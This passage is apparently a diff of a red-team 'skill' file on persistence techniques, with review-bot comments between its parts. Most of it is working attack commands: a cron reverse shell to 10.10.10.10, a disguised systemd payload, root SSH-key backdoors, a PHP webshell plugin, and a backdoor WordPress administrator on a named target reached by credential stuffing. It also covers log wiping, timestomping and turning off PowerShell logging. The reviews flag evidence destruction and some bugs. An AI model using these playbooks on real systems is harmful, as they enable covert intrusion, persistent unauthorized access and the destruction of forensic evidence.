|
762
|
+
meterpreter> mkdir WindowsUpdate
|
|
763
|
+
meterpreter> upload /tmp/payload.exe "C:\\Users\\jsmith\\AppData\\Local\\Microsoft\\WindowsUpdate\\svchost.exe"
|
|
764
|
+
|
|
765
|
+
PHASE 3: HKCU Registry Run Key
|
|
766
|
+
-------------------------------------------------------
|
|
767
|
+
meterpreter> shell
|
|
768
|
+
C:\> reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" ^
|
|
769
|
+
/v "WindowsUpdate" /t REG_SZ ^
|
|
770
|
+
/d "C:\Users\jsmith\AppData\Local\Microsoft\WindowsUpdate\svchost.exe" /f
|
|
771
|
+
|
|
772
|
+
PHASE 4: HKCU Scheduled Task (second channel)
|
|
773
|
+
-------------------------------------------------------
|
|
774
|
+
C:\> schtasks /create /tn "Microsoft\Windows\UpdateCheck" ^
|
|
775
|
+
/tr "C:\Users\jsmith\AppData\Local\Microsoft\WindowsUpdate\svchost.exe" ^
|
|
776
|
+
/sc ONLOGON /ru CORP\jsmith /f
|
|
777
|
+
|
|
778
|
+
PHASE 5: COM Hijacking (third channel — no file needed if in-memory DLL)
|
|
779
|
+
-------------------------------------------------------
|
|
780
|
+
# Research hijackable CLSIDs for installed apps on this host
|
|
781
|
+
# Register DLL in HKCU COM path
|
|
782
|
+
|
|
783
|
+
PHASE 6: Verify
|
|
784
|
+
-------------------------------------------------------
|
|
785
|
+
# Simulate logon trigger — logout/login or:
|
|
786
|
+
C:\> schtasks /run /tn "Microsoft\Windows\UpdateCheck"
|
|
787
|
+
# Catch callback on Kali listener
|
|
788
|
+
|
|
789
|
+
PHASE 7: Document
|
|
790
|
+
-------------------------------------------------------
|
|
791
|
+
# Screenshot reg query output
|
|
792
|
+
# Screenshot schtasks /query output
|
|
793
|
+
# Note artefact paths and hashes
|
|
794
|
+
```
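Review bot: two statements in Scenario A are inaccurate. `post/windows/gather/local_admin_search_enum` enumerates other hosts on the network where the current token has local admin (via OpenSCManager); it does not answer whether the user is an administrator on the current host, which is what the "Check local admin" comment implies, so `whoami /groups` or `run post/windows/gather/win_privs` is the right check. In PHASE 5, "no file needed if in-memory DLL" is wrong for COM hijacking: `InProcServer32` holds a file path and COM loads that DLL from disk, so there is always an on-disk artefact to record in the persistence log.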
|
|
795
|
+
|
|
796
|
+
---
|
|
797
|
+
|
|
798
|
+
### Scenario B — Linux Root to Stealth Multi-Layer Persistence
|
|
799
|
+
|
|
800
|
+
**Context:** Exploited a vulnerable service. Root on Ubuntu 22.04 LTS. SOC is present. Need maximum durable access.
|
|
801
|
+
|
|
802
|
+
```
|
|
803
|
+
PHASE 1: Assess environment
|
|
804
|
+
-------------------------------------------------------
|
|
805
|
+
id && whoami && hostname && uname -r
|
|
806
|
+
cat /etc/os-release
|
|
807
|
+
ps aux | grep -E "sysmon|auditd|osquery|falcon" # Check for monitoring
|
|
808
|
+
|
|
809
|
+
PHASE 2: Layer 1 — Legitimate-looking systemd service
|
|
810
|
+
-------------------------------------------------------
|
|
811
|
+
# Create binary that mimics a real service name
|
|
812
|
+
cp /tmp/payload.elf /usr/local/sbin/networkd-dispatcher
|
|
813
|
+
chmod 755 /usr/local/sbin/networkd-dispatcher
|
|
814
|
+
|
|
815
|
+
cat > /etc/systemd/system/networkd-dispatcher.service << 'EOF'
|
|
816
|
+
[Unit]
|
|
817
|
+
Description=Dispatcher daemon for systemd-networkd
|
|
818
|
+
After=network.target
|
|
819
|
+
|
|
820
|
+
[Service]
|
|
821
|
+
Type=simple
|
|
822
|
+
ExecStart=/usr/local/sbin/networkd-dispatcher
|
|
823
|
+
Restart=always
|
|
824
|
+
RestartSec=60
|
|
825
|
+
|
|
826
|
+
[Install]
|
|
827
|
+
WantedBy=multi-user.target
|
|
828
|
+
EOF
|
|
829
|
+
|
|
830
|
+
systemctl daemon-reload
|
|
831
|
+
systemctl enable networkd-dispatcher.service
|
|
832
|
+
systemctl start networkd-dispatcher.service
|
|
833
|
+
|
|
834
|
+
PHASE 3: Layer 2 — Cron (backup trigger)
|
|
835
|
+
-------------------------------------------------------
|
|
836
|
+
# System-wide cron — different C2 port as backup
|
|
837
|
+
echo "*/15 * * * * root /bin/bash -c 'bash -i >& /dev/tcp/10.10.10.10/4445 0>&1' 2>/dev/null" \
|
|
838
|
+
>> /etc/crontab
|
|
839
|
+
|
|
840
|
+
PHASE 4: Layer 3 — SSH authorized_keys on root
|
|
841
|
+
-------------------------------------------------------
|
|
842
|
+
mkdir -p /root/.ssh
|
|
843
|
+
echo "ssh-ed25519 AAAA...KEY... system@maintenance" >> /root/.ssh/authorized_keys
|
|
844
|
+
chmod 600 /root/.ssh/authorized_keys
|
|
845
|
+
|
|
846
|
+
PHASE 5: Layer 4 — PAM backdoor (Expert)
|
|
847
|
+
-------------------------------------------------------
|
|
848
|
+
# Modify PAM to accept a hardcoded password for any user
|
|
849
|
+
# CAREFUL: This can break authentication entirely if misconfigured
|
|
850
|
+
# Use only on non-critical test systems or with explicit ROE approval
|
|
851
|
+
# Reference: https://github.com/zephrfish/pambd
|
|
852
|
+
|
|
853
|
+
PHASE 6: Verify
|
|
854
|
+
-------------------------------------------------------
|
|
855
|
+
ssh -i /tmp/backdoor_key root@target_ip "id"
|
|
856
|
+
# Trigger cron manually: run payload and catch shell
|
|
857
|
+
# Check service: systemctl status networkd-dispatcher
|
|
858
|
+
|
|
859
|
+
PHASE 7: Anti-forensics (OPSEC)
|
|
860
|
+
-------------------------------------------------------
|
|
861
|
+
# Clear bash history
|
|
862
|
+
history -c && history -w
|
|
863
|
+
echo "" > ~/.bash_history
|
|
864
|
+
|
|
865
|
+
# Clear systemd journal entries (if logs are local)
|
|
866
|
+
journalctl --rotate && journalctl --vacuum-time=1s
|
|
867
|
+
|
|
868
|
+
# Modify timestamps on artefact files
|
|
869
|
+
touch -r /usr/bin/ls /usr/local/sbin/networkd-dispatcher
|
|
870
|
+
```
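Review bot: PHASE 7 of Scenario B destroys client evidence and needs an explicit ROE gate. `journalctl --vacuum-time=1s` deletes archived journal files on the host (the active journal and anything already forwarded to the SOC's collector are unaffected, and the vacuum itself is journaled), so on a host where "SOC is present" it removes the client's own incident record while leaving the forwarded copy; that is log destruction, not stealth, and must be approved and logged per 8.1. Also, `touch -r` only sets atime and mtime; the inode ctime is updated to the time of the `touch`, so the "Modify timestamps" comment should say it does not defeat ctime-based timeline analysis.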
|
|
871
|
+
|
|
872
|
+
---
|
|
873
|
+
|
|
874
|
+
### Scenario C — WordPress Admin to Persistent Web Access (Almentor Pattern)
|
|
875
|
+
|
|
876
|
+
**Context:** Obtained WordPress admin credentials via credential stuffing against Almentor's admin panel. Need persistent access that survives a password reset.
|
|
877
|
+
|
|
878
|
+
```
|
|
879
|
+
PHASE 1: Validate admin access
|
|
880
|
+
-------------------------------------------------------
|
|
881
|
+
curl -s -c /tmp/wp_cookies.txt \
|
|
882
|
+
-d "log=admin&pwd=FoundPassword&wp-submit=Log+In&redirect_to=%2Fwp-admin%2F&testcookie=1" \
|
|
883
|
+
https://target.almentor.net/wp-login.php
|
|
884
|
+
|
|
885
|
+
# Check redirect — if wp-admin loaded, we're in
|
|
886
|
+
|
|
887
|
+
PHASE 2: Create Application Password (survives main password reset)
|
|
888
|
+
-------------------------------------------------------
|
|
889
|
+
# Via WP REST API (authenticated)
|
|
890
|
+
curl -s -X POST \
|
|
891
|
+
-u "admin:FoundPassword" \
|
|
892
|
+
https://target.almentor.net/wp-json/wp/v2/users/1/application-passwords \
|
|
893
|
+
-H "Content-Type: application/json" \
|
|
894
|
+
-d '{"name":"System Maintenance API"}'
|
|
895
|
+
# Save the returned password — shown ONCE
|
|
896
|
+
|
|
897
|
+
PHASE 3: Create backdoor administrator account
|
|
898
|
+
-------------------------------------------------------
|
|
899
|
+
curl -s -X POST \
|
|
900
|
+
-u "admin:APP_PASSWORD_FROM_STEP2" \
|
|
901
|
+
https://target.almentor.net/wp-json/wp/v2/users \
|
|
902
|
+
-H "Content-Type: application/json" \
|
|
903
|
+
-d '{
|
|
904
|
+
"username": "svc.monitor",
|
|
905
|
+
"password": "M0nitor$2024!",
|
|
906
|
+
"email": "svc.monitor@corp-internal.net",
|
|
907
|
+
"roles": ["administrator"],
|
|
908
|
+
"name": "Service Monitor"
|
|
909
|
+
}'
|
|
910
|
+
|
|
911
|
+
PHASE 4: Deploy PHP webshell via plugin upload
|
|
912
|
+
-------------------------------------------------------
|
|
913
|
+
# Create malicious plugin ZIP on Kali
|
|
914
|
+
mkdir -p /tmp/wp-plugin/system-maintenance
|
|
915
|
+
cat > /tmp/wp-plugin/system-maintenance/system-maintenance.php << 'EOF'
|
|
916
|
+
<?php
|
|
917
|
+
/*
|
|
918
|
+
Plugin Name: System Maintenance
|
|
919
|
+
Description: Internal system maintenance module
|
|
920
|
+
Version: 1.0
|
|
921
|
+
*/
|
|
922
|
+
if(isset($_GET['_token']) && $_GET['_token'] === 'abc123secret') {
|
|
923
|
+
system($_GET['cmd']);
|
|
924
|
+
}
|
|
925
|
+
EOF
|
|
926
|
+
cd /tmp/wp-plugin && zip -r /tmp/system-maintenance.zip system-maintenance/
|
|
927
|
+
|
|
928
|
+
# Upload via REST API (plugin install requires special capability — use WP admin UI or wp-cli)
|
|
929
|
+
# Via wp-cli on server:
|
|
930
|
+
wp --path=/var/www/html plugin install /tmp/system-maintenance.zip --activate
|
|
931
|
+
|
|
932
|
+
# Webshell access:
|
|
933
|
+
curl "https://target.almentor.net/wp-content/plugins/system-maintenance/system-maintenance.php?_token=abc123secret&cmd=id"
|
|
934
|
+
|
|
935
|
+
PHASE 5: Verify all channels
|
|
936
|
+
-------------------------------------------------------
|
|
937
|
+
# Test application password:
|
|
938
|
+
curl -s -u "admin:APP_PASSWORD" https://target.almentor.net/wp-json/wp/v2/users/me
|
|
939
|
+
# Test backdoor admin:
|
|
940
|
+
curl -s -u "svc.monitor:M0nitor$2024!" https://target.almentor.net/wp-json/wp/v2/users/me
|
|
941
|
+
# Test webshell:
|
|
942
|
+
curl "https://target.almentor.net/.../system-maintenance.php?_token=abc123secret&cmd=whoami"
|
|
943
|
+
|
|
944
|
+
PHASE 6: Cleanup (on engagement end)
|
|
945
|
+
-------------------------------------------------------
|
|
946
|
+
wp --path=/var/www/html plugin deactivate system-maintenance
|
|
947
|
+
wp --path=/var/www/html plugin delete system-maintenance
|
|
948
|
+
wp --path=/var/www/html user delete svc.monitor --yes
|
|
949
|
+
wp --path=/var/www/html user application-password delete admin --slug="system-maintenance-api"
|
|
950
|
+
```
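Review bot: the PHASE 5 verification for the backdoor admin uses a different password from the one set in PHASE 3. `"svc.monitor:M0nitor$2024!"` is double-quoted, so the shell expands `$2` (an empty positional parameter) and sends `M0nitor024!`, while PHASE 3 placed the value inside single quotes and stored `M0nitor$2024!`; `!` also triggers history expansion in an interactive bash. Single-quote the credential or use a placeholder. The webshell token `abc123secret` and the admin password are both literals shipped in a public package, so any reader of the package knows them; they belong in per-engagement configuration, not in the skill file.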
|
|
951
|
+
|
|
952
|
+
---
|
|
953
|
+
|
|
954
|
+
## 7. OPSEC Considerations
|
|
955
|
+
|
|
956
|
+
### 7.1 Detection Risks by Technique
|
|
957
|
+
|
|
958
|
+
| Technique | Detection Method | Risk Level |
|
|
959
|
+
|---|---|---|
|
|
960
|
+
| HKCU Registry Run | Autoruns, EDR registry monitoring | MEDIUM |
|
|
961
|
+
| HKLM Registry Run | EDR, Sysmon Event ID 13 | HIGH |
|
|
962
|
+
| Startup Folder | File creation monitoring, EDR | HIGH |
|
|
963
|
+
| Schtasks | Sysmon Event ID 11, 4698 (Task Scheduled) | HIGH |
|
|
964
|
+
| Windows Service | Event 7045 (Service Installed) | HIGH |
|
|
965
|
+
| WMI Subscription | Sysmon Event ID 19/20/21, WMI-Activity log | MEDIUM-HIGH |
|
|
966
|
+
| DLL Hijacking | EDR module load monitoring, PE analysis | MEDIUM |
|
|
967
|
+
| COM Hijacking | EDR COM monitoring, HKCU COM writes | LOW-MEDIUM |
|
|
968
|
+
| User Cron | Auditd, inotify watchers | LOW |
|
|
969
|
+
| ~/.bashrc | Auditd file write events | LOW |
|
|
970
|
+
| authorized_keys | Auditd, SSH log correlation | MEDIUM |
|
|
971
|
+
| systemd service | Systemd journal, auditd | MEDIUM |
|
|
972
|
+
| LD_PRELOAD | /etc/ld.so.preload monitoring, auditd | LOW-MEDIUM |
|
|
973
|
+
| WP App Password | WordPress audit logs, login monitoring | LOW |
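Review bot: the Detection Method column mixes log sources under the "Sysmon" label. Event 4698 (A scheduled task was created) is a Windows Security log event, 7045 is a System log event from Service Control Manager, and Sysmon 11 is file creation; TaskScheduler/Operational 106 (task registered) also belongs in the Schtasks row. Labelling each ID with its source (Security, System, Sysmon, TaskScheduler) makes the table usable for deconfliction with the client's blue team. For the COM row, the concrete signal is Sysmon 12/13 on writes under `HKCU\Software\Classes\CLSID\...\InProcServer32`.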
|
|
974
|
+
|
|
975
|
+
### 7.2 Evasion Principles
|
|
976
|
+
|
|
977
|
+
**Blend in with legitimate software names:**
|
|
978
|
+
- Use names from `tasklist` output or `sc query` that already exist
|
|
979
|
+
- Avoid generic names like "backdoor", "shell", "hack"
|
|
980
|
+
- Match capitalization and naming conventions of existing tasks/services
|
|
981
|
+
|
|
982
|
+
**Timestamp manipulation:**
|
|
983
|
+
```bash
|
|
984
|
+
# Match timestamps of dropped files to existing system files
|
|
985
|
+
touch -r /usr/bin/ls /path/to/payload
|
|
986
|
+
touch -r C:\Windows\System32\svchost.exe C:\Windows\Temp\payload.exe # PowerShell equivalent
|
|
987
|
+
```
|
|
988
|
+
|
|
989
|
+
**Avoid common IOC patterns:**
|
|
990
|
+
- Do not use `cmd.exe` as parent of PowerShell in scheduled tasks
|
|
991
|
+
- Prefer `lolbas` (Living Off the Land Binaries) over dropped EXEs
|
|
992
|
+
- Use HTTPS C2 on port 443 — blends with web traffic
|
|
993
|
+
- Avoid `IEX` without encoding — commonly flagged
|
|
994
|
+
|
|
995
|
+
**Limit execution frequency:**
|
|
996
|
+
- Cron every 5 minutes creates 288 events/day — noisy
|
|
997
|
+
- Prefer event-triggered persistence (logon, startup) over scheduled polling
|
|
998
|
+
|
|
999
|
+
**Disable Windows Script Block Logging in PowerShell (if admin):**
|
|
1000
|
+
```powershell
|
|
1001
|
+
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Name "EnableScriptBlockLogging" -Value 0
|
|
1002
|
+
```
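Review bot: the "Disable Windows Script Block Logging" step is defence tampering (ATT&CK T1562.002, Disable Windows Event Logging) on a client host and should be gated behind explicit ROE approval, not listed as a routine evasion principle; it changes the client's security posture, the registry write is itself visible to Sysmon event 13, and where the setting comes from Group Policy it is re-applied at the next refresh, so the client may be left with a transient logging gap and a detectable change for no durable effect. In the timestamp block above, `touch -r C:\Windows\System32\svchost.exe ...` is not a PowerShell command and will not run as written; either mark it as pseudo-code or drop the "PowerShell equivalent" comment.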
|
|
1003
|
+
|
|
1004
|
+
### 7.3 Cleanup Protocol
|
|
1005
|
+
|
|
1006
|
+
**Always clean up in this order:**
|
|
1007
|
+
1. Stop the persistence mechanism (stop service, disable task)
|
|
1008
|
+
2. Remove the trigger (delete registry key, cron entry, service)
|
|
1009
|
+
3. Remove the payload file
|
|
1010
|
+
4. Clear relevant logs
|
|
1011
|
+
5. Verify removal
|
|
1012
|
+
6. Document cleanup in engagement log
|
|
1013
|
+
|
|
1014
|
+
**Windows cleanup verification:**
|
|
1015
|
+
```powershell
|
|
1016
|
+
# Check common persistence locations
|
|
1017
|
+
Get-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run"
|
|
1018
|
+
Get-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run"
|
|
1019
|
+
Get-ScheduledTask | Where-Object State -ne Disabled | Select-Object TaskName,TaskPath
|
|
1020
|
+
Get-Service | Where-Object StartType -eq Automatic | Select-Object Name,DisplayName
|
|
1021
|
+
Get-WMIObject -Namespace root\subscription -Class __EventFilter
|
|
1022
|
+
```
|
|
1023
|
+
|
|
1024
|
+
**Linux cleanup verification:**
|
|
1025
|
+
```bash
|
|
1026
|
+
crontab -l
|
|
1027
|
+
cat /etc/crontab
|
|
1028
|
+
ls /etc/cron.d/
|
|
1029
|
+
systemctl list-unit-files --state=enabled
|
|
1030
|
+
cat /etc/ld.so.preload
|
|
1031
|
+
cat ~/.ssh/authorized_keys
|
|
1032
|
+
grep -n "suspicious_content" ~/.bashrc ~/.profile ~/.bash_profile
|
|
1033
|
+
```
|
|
1034
|
+
|
|
1035
|
+
---
|
|
1036
|
+
|
|
1037
|
+
## 8. Output and Documentation Instructions
|
|
1038
|
+
|
|
1039
|
+
### 8.1 What to Capture
|
|
1040
|
+
|
|
1041
|
+
For every persistence mechanism deployed, document:
|
|
1042
|
+
|
|
1043
|
+
```
|
|
1044
|
+
[PERSISTENCE LOG ENTRY]
|
|
1045
|
+
Date/Time (UTC):
|
|
1046
|
+
Target Host:
|
|
1047
|
+
Target OS:
|
|
1048
|
+
Operator:
|
|
1049
|
+
Technique Used:
|
|
1050
|
+
Privilege Level:
|
|
1051
|
+
Artefact Path(s):
|
|
1052
|
+
- Payload: <path> | SHA256: <hash>
|
|
1053
|
+
- Config entry: <key/file/service name>
|
|
1054
|
+
Trigger:
|
|
1055
|
+
C2 Channel: <IP>:<PORT> (protocol)
|
|
1056
|
+
Verification: [PASS/FAIL] — method used
|
|
1057
|
+
OPSEC notes:
|
|
1058
|
+
Cleanup status: [PENDING/COMPLETE]
|
|
1059
|
+
Cleanup steps taken:
|
|
1060
|
+
```
|
|
1061
|
+
|
|
1062
|
+
### 8.2 Screenshot Checklist
|
|
1063
|
+
|
|
1064
|
+
- [ ] `whoami` / `id` before persistence deployment
|
|
1065
|
+
- [ ] Command output of deployment step
|
|
1066
|
+
- [ ] Verification command output (task list, reg query, service status)
|
|
1067
|
+
- [ ] Callback received in listener (timestamp visible)
|
|
1068
|
+
- [ ] Cleanup confirmation commands and output
|
|
1069
|
+
|
|
1070
|
+
### 8.3 Artefact Hashing
|
|
1071
|
+
|
|
1072
|
+
```bash
|
|
1073
|
+
# On Kali — hash payload before transfer
|
|
1074
|
+
sha256sum /tmp/payload.exe
|
|
1075
|
+
|
|
1076
|
+
# On Windows target
|
|
1077
|
+
Get-FileHash "C:\Windows\Temp\payload.exe" -Algorithm SHA256
|
|
1078
|
+
|
|
1079
|
+
# On Linux target
|
|
1080
|
+
sha256sum /usr/local/bin/.sysupdate
|
|
1081
|
+
```
|
|
1082
|
+
|
|
1083
|
+
### 8.4 Engagement Log Format
|
|
1084
|
+
|
|
1085
|
+
```markdown
|
|
1086
|
+
## Persistence — [Target] — [Date]
|
|
1087
|
+
|
|
1088
|
+
### Deployed Mechanisms
|
|
1089
|
+
| ID | Host | Technique | Artefact | C2 | Status |
|
|
1090
|
+
|----|------|-----------|----------|----|--------|
|
|
1091
|
+
| P1 | DC01 | Schtasks SYSTEM | \Microsoft\Windows\WinDefend\ScanTask | 10.10.10.10:443 | ACTIVE |
|
|
1092
|
+
| P2 | WEB01 | WP App Password | admin/System Maintenance API | N/A | ACTIVE |
|
|
1093
|
+
|
|
1094
|
+
### Cleanup Log
|
|
1095
|
+
| ID | Cleaned By | Time | Method |
|
|
1096
|
+
|----|-----------|------|--------|
|
|
1097
|
+
| P1 | operator | 2026-05-31 18:00 UTC | schtasks /delete |
|
|
1098
|
+
| P2 | operator | 2026-05-31 18:05 UTC | wp user application-password delete |
|
|
1099
|
+
```
|
|
1100
|
+
|
|
1101
|
+
---
|
|
1102
|
+
|
|
1103
|
+
## 9. Resources
|
|
1104
|
+
|
|
1105
|
+
### Official Documentation
|
|
1106
|
+
- MITRE ATT&CK — Persistence Tactic: https://attack.mitre.org/tactics/TA0003/
|
|
1107
|
+
- MITRE ATT&CK — Boot or Logon Autostart Execution: https://attack.mitre.org/techniques/T1547/
|
|
1108
|
+
- MITRE ATT&CK — Scheduled Task/Job: https://attack.mitre.org/techniques/T1053/
|
|
1109
|
+
- MITRE ATT&CK — WMI Event Subscription: https://attack.mitre.org/techniques/T1546/003/
|
|
1110
|
+
|
|
1111
|
+
### Tools and Frameworks
|
|
1112
|
+
- SharPersist (Mandiant): https://github.com/mandiant/SharPersist
|
|
1113
|
+
- SharpWMI (GhostPack): https://github.com/GhostPack/SharpWMI
|
|
1114
|
+
- PowerSploit (PowerShellMafia): https://github.com/PowerShellMafia/PowerSploit
|
|
1115
|
+
- Impacket (Fortra): https://github.com/fortra/impacket
|
|
1116
|
+
- CrackMapExec: https://github.com/byt3bl33d3r/CrackMapExec
|
|
1117
|
+
- Evil-WinRM: https://github.com/Hackplayers/evil-winrm
|
|
1118
|
+
- COMHijackToolkit: https://github.com/dr4k0nia/COMHijackToolkit
|
|
1119
|
+
- Chisel (tunneling): https://github.com/jpillora/chisel
|
|
1120
|
+
|
|
1121
|
+
### WMI Persistence Deep Dives
|
|
1122
|
+
- FireEye WMI Persistence: https://github.com/mandiant/wmi-monitor
|
|
1123
|
+
- WMI for script kiddies (Matt Graeber): https://github.com/mattifestation/WMIBackdoor
|
|
1124
|
+
|
|
1125
|
+
### DLL / COM Hijacking
|
|
1126
|
+
- Windows DLL Hijacking (Wietze Beukema): https://github.com/wietze/windows-dll-hijacking
|
|
1127
|
+
- LOLBAS Project: https://github.com/LOLBAS-Project/LOLBAS
|
|
1128
|
+
- LOOBins (macOS/Linux LOLB): https://github.com/infosecB/LOOBins
|
|
1129
|
+
|
|
1130
|
+
### Linux Persistence
|
|
1131
|
+
- Persistence The Unix Way (SANS): https://www.sans.org/reading-room/whitepapers/linux/paper/39450
|
|
1132
|
+
- Diamorphine LKM Rootkit: https://github.com/m0nad/Diamorphine
|
|
1133
|
+
- PAM Backdoor reference: https://github.com/zephrfish/pambd
|
|
1134
|
+
|
|
1135
|
+
### WordPress Security
|
|
1136
|
+
- WP Application Passwords: https://make.wordpress.org/core/2020/11/05/application-passwords-integration-guide/
|
|
1137
|
+
- WPScan: https://github.com/wpscanteam/wpscan
|
|
1138
|
+
|
|
1139
|
+
### Detection and Hunting (Know Your Adversary)
|
|
1140
|
+
- Sysmon Config (SwiftOnSecurity): https://github.com/SwiftOnSecurity/sysmon-config
|
|
1141
|
+
- Sigma Rules — Persistence: https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set
|
|
1142
|
+
- Awesome WMI (detection): https://github.com/davidpany/WMI_Forensics
|
|
1143
|
+
|
|
1144
|
+
---
|
|
1145
|
+
|
|
1146
|
+
*Skill maintained by RTExit Red Team. Update engagement-specific sections after each engagement post-mortem.*
|
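Review bot: step 4 of the 7.3 Cleanup Protocol ("Clear relevant logs") and the "Disable Windows Script Block Logging in PowerShell" block just above it both delete or switch off the client's own detection telemetry, which on an authorized engagement destroys the evidence the blue team needs to measure detection coverage and is usually outside the rules of engagement; suggest replacing step 4 with "Preserve logs and hand the artefact list (paths, SHA256, timestamps) to the client's detection team" and either dropping the ScriptBlockLogging registry edit or gating it behind explicit written RoE authorization, recorded in the 8.1 log entry so the setting is restored during cleanup. Two smaller points in the same region: the line `touch -r C:\Windows\System32\svchost.exe C:\Windows\Temp\payload.exe # PowerShell equivalent` is a Unix `touch` invocation, not PowerShell, so the comment is misleading and the line will not run on a Windows target as written; and in the Windows cleanup verification block `Get-WMIObject` was removed in PowerShell 7, so the check should use `Get-CimInstance -Namespace root\subscription -ClassName __EventFilter` and also enumerate `__EventConsumer` and `__FilterToConsumerBinding`, because a deleted filter that leaves a dangling consumer or binding behind is exactly what a responder will still find, and the verification step would report a false PASS. The 8.4 Cleanup Log table should also carry the artefact SHA256 from the corresponding 8.1 entry so each removal can be matched to the file that was actually dropped.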